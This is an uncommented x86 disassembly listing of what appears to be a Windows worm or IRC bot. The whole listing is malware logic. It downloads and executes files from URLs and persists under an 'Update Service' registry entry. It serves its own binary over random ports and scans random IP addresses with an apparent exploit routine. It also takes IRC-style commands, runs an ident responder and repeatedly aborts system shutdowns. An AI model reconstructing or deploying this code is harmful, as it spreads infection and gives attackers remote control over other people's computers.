push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_313010A8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_313026DC
push 2
jmp short loc_313026FC
; ---------------------------------------------------------------------------
loc_313026DC: ; CODE XREF: sub_3130263B+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31301148 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_313026FF
push [ebp+var_4]
call dword_313010A0 ; CloseHandle
push 3
loc_313026FC: ; CODE XREF: sub_3130263B+26�j
; sub_3130263B+9F�j
pop eax
jmp short loc_31302750
; ---------------------------------------------------------------------------
loc_313026FF: ; CODE XREF: sub_3130263B+B4�j
mov edi, 100000h
push edi
call sub_31303717
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31301144 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_313010A4 ; WriteFile
push [ebp+var_4]
call dword_313010A0 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31302B15
push ebx
call sub_3130372B
add esp, 0Ch
xor eax, eax
loc_31302750: ; CODE XREF: sub_3130263B+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_3130263B endp
; =============== S U B R O U T I N E =======================================
sub_31302755 proc near ; CODE XREF: sub_31302260+C0�p
var_3CC = dword ptr -3CCh
var_3C8 = byte ptr -3C8h
var_364 = byte ptr -364h
var_300 = byte ptr -300h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 3CCh
push ebx
push ebp
push esi
push edi
push offset dword_31304FA0
mov esi, ecx
push [esp+3E0h+arg_0]
call dword_3130110C ; strstr
mov edi, dword_313010E8
pop ecx
mov ebx, eax
pop ecx
mov [esp+3DCh+var_3CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_31302794
and dword ptr [esi+180h], 0
loc_31302794: ; CODE XREF: sub_31302755+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_313027F7
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_313027F7
lea eax, [esp+3DCh+var_200]
push eax
call sub_3130263B
test eax, eax
pop ecx
jnz short loc_313027F7
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+3E0h+var_3C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+180h], 1
call dword_31301134 ; wsprintfA
add esp, 0Ch
lea eax, [esp+3DCh+var_3C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_3130235D
loc_313027F7: ; CODE XREF: sub_31302755+43�j
; sub_31302755+55�j ...
test ebx, ebx
jz loc_31302A37
push ebx
call dword_313010CC ; lstrlen
cmp eax, 0Ah
jle loc_31302A37
mov ebp, dword_31301110
add ebx, 8
push 7Ch
push ebx
call ebp ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31302A37
and byte ptr [edi], 0
push ebx
call dword_313010CC ; lstrlen
cmp eax, 100h
jge loc_31302A5E
push dword_31304F9C
lea eax, [esp+3E0h+var_300]
push ebx
push eax
call sub_31301DB0
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_31302A37
and byte ptr [edi], 0
push ebx
call dword_313010CC ; lstrlen
cmp eax, 100h
jge loc_31302A5E
push dword_31304F9C
lea eax, [esp+3E0h+var_200]
push ebx
push eax
call sub_31301DB0
add esp, 0Ch
lea eax, [esp+3DCh+var_300]
push offset aE ; "e"
push eax
call dword_31301088 ; lstrcmp
mov ebx, dword_31301090
test eax, eax
jnz loc_3130299E
lea eax, [esp+3DCh+var_200]
push eax
call dword_313010CC ; lstrlen
cmp eax, 0FFh
jge loc_3130299E
cmp dword ptr [esi+180h], 0
jnz loc_3130299E
cmp dword ptr [esi+7Ch], 0
jnz loc_3130299E
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; strchr
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_3130297F
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_313010CC ; lstrlen
cmp eax, 100h
jge loc_31302A5E
lea eax, [edi+1]
push eax
lea eax, [esp+3E0h+var_100]
push eax
call ebx ; lstrcpy
push [esp+3DCh+var_3CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; lstrcpy
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+3DCh+var_100], 62h
jle short loc_3130298C
lea eax, [esp+3DCh+var_FF]
push eax
call dword_313010FC ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_3130298C
cmp ebp, 0E10h
jnb short loc_3130298C
call dword_31301120 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_313010E8 ; GetTickCount
mov [esi+74h], eax
jmp short loc_3130298C
; ---------------------------------------------------------------------------
loc_3130297F: ; CODE XREF: sub_31302755+1A0�j
push [esp+3DCh+var_3CC]
lea eax, [esi+80h]
push eax
call ebx ; lstrcpy
loc_3130298C: ; CODE XREF: sub_31302755+1EC�j
; sub_31302755+201�j ...
lea eax, [esi+80h]
push offset asc_31304E34 ; "|"
push eax
call dword_313010EC ; lstrcat
loc_3130299E: ; CODE XREF: sub_31302755+15C�j
; sub_31302755+175�j ...
mov ebp, dword_31301088
lea eax, [esp+3DCh+var_300]
push offset aI ; "i"
push eax
call ebp ; lstrcmp
test eax, eax
jnz short loc_31302A14
lea eax, [esp+3DCh+var_3C8]
push offset dword_31304FC0
push eax
call ebx ; lstrcpy
lea eax, [esp+3DCh+var_3C8]
push 63h
push eax
push 7
push 400h
call dword_31301088+4
push ds:dword_31305004
lea eax, [esp+3E0h+var_3C8]
push eax
lea eax, [esp+3E4h+var_364]
push ds:dword_31305000
push dword_31304FC8
push offset aDD9SD ; "%d,%d,9%s,%d"
push eax
call dword_31301134 ; wsprintfA
add esp, 18h
lea eax, [esp+3DCh+var_364]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_3130235D
loc_31302A14: ; CODE XREF: sub_31302755+260�j
lea eax, [esp+3DCh+var_300]
push offset aQ ; "q"
push eax
call ebp ; lstrcmp
test eax, eax
jnz short loc_31302A34
cmp [esi+180h], eax
jz short loc_31302A34
push 1
pop eax
jmp short loc_31302A60
; ---------------------------------------------------------------------------
loc_31302A34: ; CODE XREF: sub_31302755+2D0�j
; sub_31302755+2D8�j
mov byte ptr [edi], 7Ch
loc_31302A37: ; CODE XREF: sub_31302755+A4�j
; sub_31302755+B4�j ...
cmp dword ptr [esi+180h], 0
jz short loc_31302A5E
push offset aJoin ; "JOIN"
push [esp+3E0h+arg_0]
call dword_3130110C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31302A5E
call dword_31301120 ; rand
loc_31302A5E: ; CODE XREF: sub_31302755+E3�j
; sub_31302755+124�j ...
xor eax, eax
loc_31302A60: ; CODE XREF: sub_31302755+2DD�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 3CCh
retn 4
sub_31302755 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302A6D proc near ; CODE XREF: sub_313014C6+8�p
; sub_313023D4+57�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_313010E8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31301100 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31302A6D endp
; =============== S U B R O U T I N E =======================================
sub_31302A9B proc near ; CODE XREF: sub_31301C20+EA�p
; UPX0:31302DDB�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_31301084 ; CreateMutexA
retn
sub_31302A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302AAA proc near ; CODE XREF: sub_31302E37+7C�p
; sub_31302E37+8A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_313010C4 ; CreateThread
pop ebp
retn
sub_31302AAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302AC4 proc near ; CODE XREF: sub_31302C49+12C�p
; sub_31302E37+62�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_313010C4 ; CreateThread
push eax
call dword_313010A0 ; CloseHandle
pop ebp
retn
sub_31302AC4 endp
; =============== S U B R O U T I N E =======================================
sub_31302AE5 proc near ; CODE XREF: sub_31301E60+88�p
; sub_31301E60+155�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31302B0D
loc_31302AF6: ; CODE XREF: sub_31302AE5+26�j
call dword_31301120 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31302AF6
loc_31302B0D: ; CODE XREF: sub_31302AE5+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31302AE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302B15 proc near ; CODE XREF: sub_31301341+16B�p
; sub_3130263B+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31303744 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_31301080 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_313010A0
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31302B15 endp
; =============== S U B R O U T I N E =======================================
sub_31302B6B proc near ; CODE XREF: sub_31301E60+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31301160 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_31302B88
test esi, esi
jnz short loc_31302B9A
cmp byte ptr [edi], 30h
jz short loc_31302BA1
loc_31302B88: ; CODE XREF: sub_31302B6B+12�j
push edi
call dword_31301164 ; gethostbyname
test eax, eax
jz short loc_31302B9A
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_31302B9A: ; CODE XREF: sub_31302B6B+16�j
; sub_31302B6B+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_31302BA1
xor esi, esi
loc_31302BA1: ; CODE XREF: sub_31302B6B+1B�j
; sub_31302B6B+32�j
mov eax, esi
pop edi
pop esi
retn
sub_31302B6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302BA6 proc near ; CODE XREF: sub_31303196+37�p
; sub_31303256+4E�p
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_31301158 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31302BC7
call dword_3130115C ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31302BC7: ; CODE XREF: sub_31302BA6+15�j
lea eax, [ebp+var_34]
push eax
call dword_31301164 ; gethostbyname
test eax, eax
jnz short loc_31302BDC
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31302BDC: ; CODE XREF: sub_31302BA6+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31302BA6 endp
; =============== S U B R O U T I N E =======================================
sub_31302BE5 proc near ; CODE XREF: sub_31302260:loc_3130229B�p
; sub_31302260+CD�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3130113C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31302BE5 endp
; =============== S U B R O U T I N E =======================================
sub_31302BFB proc near ; DATA XREF: sub_31302C49+127�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
push dword_31304FCC
push dword_31304FC4
push esi
call dword_31301194 ; send
push 7D0h
call dword_313010D0 ; Sleep
push offset dword_31304FC8
call dword_3130107C ; InterlockedIncrement
push 2
push esi
call dword_31301174 ; shutdown
push esi
call dword_3130118C ; closesocket
push 0
call dword_313010B8 ; ExitThread
xor eax, eax
pop esi
retn 4
sub_31302BFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302C49 proc near ; DATA XREF: sub_31302E37+82�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31302A6D
lea eax, [ebp+var_130]
push 104h
push eax
push offset aUpdateService ; "Update Service"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31304FC8, ebx
call sub_3130336A
add esp, 14h
test eax, eax
jnz loc_31302D7E
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_313010A8 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31302CB5
push 1
call dword_313010B8 ; ExitThread
loc_31302CB5: ; CODE XREF: sub_31302C49+62�j
push ebx
push esi
call dword_31301074 ; GetFileSize
push eax
mov dword_31304FCC, eax
call sub_31303717
pop ecx
mov dword_31304FC4, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31304FCC
push eax
push esi
call dword_31301078 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31304FCC, eax
call dword_313010A0 ; CloseHandle
push ebx
push 1
push 2
call dword_31301178 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31303744 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31302D17: ; CODE XREF: sub_31302C49+E5�j
; sub_31302C49+ED�j ...
call dword_31301120 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31304FF8, eax
jz short loc_31302D17
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31302D17
push eax
call dword_3130117C ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31301180 ; bind
test eax, eax
jnz short loc_31302D17
push 64h
push edi
call dword_31301184 ; listen
mov [ebp+var_8], esi
pop esi
loc_31302D60: ; CODE XREF: sub_31302C49+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31301188 ; accept
push eax
push offset sub_31302BFB
call sub_31302AC4
pop ecx
pop ecx
jmp short loc_31302D60
; ---------------------------------------------------------------------------
loc_31302D7E: ; CODE XREF: sub_31302C49+3D�j
push ebx
call dword_313010B8 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31302C49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302D8D proc near ; CODE XREF: sub_31302E37+1F�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_31301150
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31302D8D endp
; ---------------------------------------------------------------------------
loc_31302DB9: ; CODE XREF: UPX1:313072D8�j
push 0
call dword_313010DC ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31304FFC, eax
call dword_3130106C ; DeleteFileA
call sub_31302A6D
push offset aUterm_9 ; "uterm_9"
call sub_31302A9B
pop ecx
mov dword_31304FD0, eax
call dword_31301094 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31302DFB
push 1
call dword_31301070 ; ExitProcess
loc_31302DFB: ; CODE XREF: UPX0:31302DF1�j
call sub_31301B98
call sub_313034CE
call sub_31303641
push offset sub_31302E37
call sub_31301C20
test eax, eax
pop ecx
jz short loc_31302E20
push 0
call sub_31302E37
loc_31302E20: ; CODE XREF: UPX0:31302E17�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31302E23 proc near ; CODE XREF: sub_31302E37:loc_31302EE8�p
; sub_313030B2:loc_313030CA�p ...
push 0
push dword_31304FD4
call dword_313010C0 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31302E23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302E37 proc near ; CODE XREF: UPX0:31302E1B�p
; DATA XREF: UPX0:31302E0A�o
var_20 = dword ptr -20h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
xor edi, edi
push offset aU9x ; "u9x"
push edi
push 1
push edi
call dword_313010C8 ; CreateEventA
mov dword_31304FD4, eax
call sub_31302D8D
push offset aU6 ; "u6"
call sub_31302A9B
mov [esp+20h+var_20], offset aU7 ; "u7"
call sub_31302A9B
mov [esp+20h+var_20], offset aU9 ; "u9"
call sub_31302A9B
cmp [ebp+arg_0], edi
pop ecx
jz short loc_31302E93
push offset aUterm_9 ; "uterm_9"
call sub_31302A9B
pop ecx
mov dword_31304FD0, eax
loc_31302E93: ; CODE XREF: sub_31302E37+4A�j
push edi
push offset sub_31302F59
call sub_31302AC4
mov esi, dword_313010D0
pop ecx
pop ecx
push 1F4h
call esi ; Sleep
push edi
push offset loc_31302432
call sub_31302AAA
push edi
push offset sub_31302C49
mov [ebp+var_10], eax
call sub_31302AAA
push edi
push offset sub_31301562
mov [ebp+var_C], eax
call sub_31302AAA
push edi
push offset sub_31303256
mov [ebp+var_8], eax
call sub_31302AAA
add esp, 20h
mov [ebp+var_4], eax
loc_31302EE8: ; CODE XREF: sub_31302E37+C8�j
call sub_31302E23
test eax, eax
jnz short loc_31302F01
push edi
call dword_31301018 ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_31302EE8
; ---------------------------------------------------------------------------
loc_31302F01: ; CODE XREF: sub_31302E37+B8�j
push 4
lea edi, [ebp+var_10]
pop ebx
loc_31302F07: ; CODE XREF: sub_31302E37+E6�j
mov esi, [edi]
push 1
push esi
call dword_31301068 ; TerminateThread
push esi
call dword_313010A0 ; CloseHandle
add edi, 4
dec ebx
jnz short loc_31302F07
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_31302E37 endp
; =============== S U B R O U T I N E =======================================
sub_31302F28 proc near ; CODE XREF: sub_31302F59+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_3130374A ; strlen
test eax, eax
pop ecx
jbe short loc_31302F56
loc_31302F3B: ; CODE XREF: sub_31302F28+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31302F46
cmp al, 0Dh
jnz short loc_31302F4A
loc_31302F46: ; CODE XREF: sub_31302F28+18�j
and byte ptr [esi+edi], 0
loc_31302F4A: ; CODE XREF: sub_31302F28+1C�j
push edi
inc esi
call sub_3130374A ; strlen
cmp esi, eax
pop ecx
jb short loc_31302F3B
loc_31302F56: ; CODE XREF: sub_31302F28+11�j
pop edi
pop esi
retn
sub_31302F28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302F59 proc near ; DATA XREF: sub_31302E37+5D�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_31302A6D
call dword_31301120 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31302AE5
lea eax, [ebp+var_48]
mov ebx, offset dword_31304FD8
push eax
push ebx
call sub_3130379C ; _mbscpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_31301178 ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31301154 ; htonl
push 71h
mov [ebp+var_14], eax
call dword_3130117C ; htons
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31301180 ; bind
test eax, eax
jz short loc_31302FE5
push 1
pop eax
loc_31302FE0: ; CODE XREF: sub_31302F59+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31302FE5: ; CODE XREF: sub_31302F59+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_31301184 ; listen
test eax, eax
jz short loc_31302FFD
push 1
pop eax
pop edi
pop esi
jmp short loc_31302FE0
; ---------------------------------------------------------------------------
loc_31302FFD: ; CODE XREF: sub_31302F59+9B�j
mov edi, dword_313010D0
loc_31303003: ; CODE XREF: sub_31302F59+C6�j
; sub_31302F59+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31301188 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31303021
push 64h
call edi ; Sleep
jmp short loc_31303003
; ---------------------------------------------------------------------------
loc_31303021: ; CODE XREF: sub_31302F59+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_31301190 ; recv
test eax, eax
jnz short loc_31303043
loc_3130303A: ; CODE XREF: sub_31302F59+157�j
push esi
call dword_3130118C ; closesocket
jmp short loc_31303003
; ---------------------------------------------------------------------------
loc_31303043: ; CODE XREF: sub_31302F59+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31302F28
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_31303796 ; _mbscat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_31303796 ; _mbscat
lea eax, [ebp+var_148]
push offset asc_31304E60 ; "\r\n"
push eax
call sub_31303796 ; _mbscat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_3130374A ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_31301194 ; send
push 1388h
call edi ; Sleep
jmp short loc_3130303A
sub_31302F59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313030B2 proc near ; DATA XREF: sub_31303112+54�o
; sub_31303196+63�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_313030C1
push 1
pop eax
jmp short locret_3130310E
; ---------------------------------------------------------------------------
loc_313030C1: ; CODE XREF: sub_313030B2+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
mov [ebp+var_1], al
xor bl, bl
loc_313030CA: ; CODE XREF: sub_313030B2+57�j
call sub_31302E23
test eax, eax
jnz short loc_3130310B
call sub_31302BE5
test eax, eax
jz short loc_3130310B
cmp [ebp+var_1], bl
jz short loc_31303104
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31301631
pop ecx
call dword_31301120 ; rand
cdq
mov ecx, 15Eh
idiv ecx
add edx, ecx
push edx
call dword_313010D0 ; Sleep
loc_31303104: ; CODE XREF: sub_313030B2+2D�j
inc bl
cmp bl, 0FFh
jb short loc_313030CA
loc_3130310B: ; CODE XREF: sub_313030B2+1F�j
; sub_313030B2+28�j
xor eax, eax
pop ebx
locret_3130310E: ; CODE XREF: sub_313030B2+D�j
leave
retn 4
sub_313030B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303112 proc near ; DATA XREF: sub_31303196+73�o
; sub_31303256+AA�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31303120
push 1
pop eax
jmp short loc_31303192
; ---------------------------------------------------------------------------
loc_31303120: ; CODE XREF: sub_31303112+7�j
push ebx
push esi
call sub_31302A6D
mov esi, dword_31301120
xor ebx, ebx
loc_3130312F: ; CODE XREF: sub_31303112+7A�j
call sub_31302E23
test eax, eax
jnz short loc_3130318E
call sub_31302BE5
test eax, eax
jz short loc_3130318E
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31305000
mov byte ptr [ebp+arg_0+3], al
call dword_3130107C ; InterlockedIncrement
push [ebp+arg_0]
call sub_31301631
test eax, eax
pop ecx
jnz short loc_31303172
push [ebp+arg_0]
push offset sub_313030B2
call sub_31302AC4
pop ecx
pop ecx
loc_31303172: ; CODE XREF: sub_31303112+4F�j
call esi ; rand
cdq
mov ecx, 15Eh
idiv ecx
add edx, ecx
push edx
call dword_313010D0 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_3130312F
loc_3130318E: ; CODE XREF: sub_31303112+24�j
; sub_31303112+2D�j
pop esi
xor eax, eax
pop ebx
loc_31303192: ; CODE XREF: sub_31303112+C�j
pop ebp
retn 4
sub_31303112 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303196 proc near ; DATA XREF: sub_31303256+C2�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_31302A6D
call sub_31302E23
test eax, eax
jnz loc_31303248
push ebx
push esi
mov esi, dword_31301120
push edi
loc_313031B5: ; CODE XREF: sub_31303196+41�j
; sub_31303196+A9�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_313031C4: ; CODE XREF: sub_31303196+35�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_313031C4
call sub_31302BA6
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_313031B5
call sub_31302BE5
test eax, eax
jz short loc_3130321A
push offset dword_31305000
call dword_3130107C ; InterlockedIncrement
push edi
call sub_31301631
test eax, eax
pop ecx
jnz short loc_31303225
push edi
push offset sub_313030B2
call sub_31302AC4
pop ecx
pop ecx
push 4
pop ebx
loc_31303208: ; CODE XREF: sub_31303196+80�j
push edi
push offset sub_31303112
call sub_31302AC4
pop ecx
dec ebx
pop ecx
jnz short loc_31303208
jmp short loc_31303225
; ---------------------------------------------------------------------------
loc_3130321A: ; CODE XREF: sub_31303196+4A�j
push 2710h
call dword_313010D0 ; Sleep
loc_31303225: ; CODE XREF: sub_31303196+60�j
; sub_31303196+82�j
call esi ; rand
cdq
mov ecx, 15Eh
idiv ecx
add edx, ecx
push edx
call dword_313010D0 ; Sleep
call sub_31302E23
test eax, eax
jz loc_313031B5
pop edi
pop esi
pop ebx
loc_31303248: ; CODE XREF: sub_31303196+10�j
push 0
call dword_313010B8 ; ExitThread
xor eax, eax
leave
retn 4
sub_31303196 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303256 proc near ; DATA XREF: sub_31302E37+9E�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
xor esi, esi
mov ds:dword_31305000, esi
loc_31303266: ; CODE XREF: sub_31303256+24�j
call sub_31302BE5
test eax, eax
jnz short loc_3130327C
push 1388h
call dword_313010D0 ; Sleep
jmp short loc_31303266
; ---------------------------------------------------------------------------
loc_3130327C: ; CODE XREF: sub_31303256+17�j
lea eax, [ebp+var_4]
push esi
push eax
call dword_3130113C ; InternetGetConnectedState
test [ebp+var_4], 2
push 50h
mov ds:dword_31305004, esi
pop ebx
jz short loc_313032A3
mov ds:dword_31305004, 1
add ebx, 46h
loc_313032A3: ; CODE XREF: sub_31303256+3E�j
push edi
call sub_31302BA6
mov esi, eax
mov ax, word ptr dword_31304FF8
push eax
call dword_3130117C ; htons
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push 2
push eax
push offset loc_31304122
call sub_3130373E ; memcpy
mov eax, esi
push 4
xor eax, 0AAAAAAAAh
pop edi
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push edi
push eax
push offset loc_31304124
call sub_3130373E ; memcpy
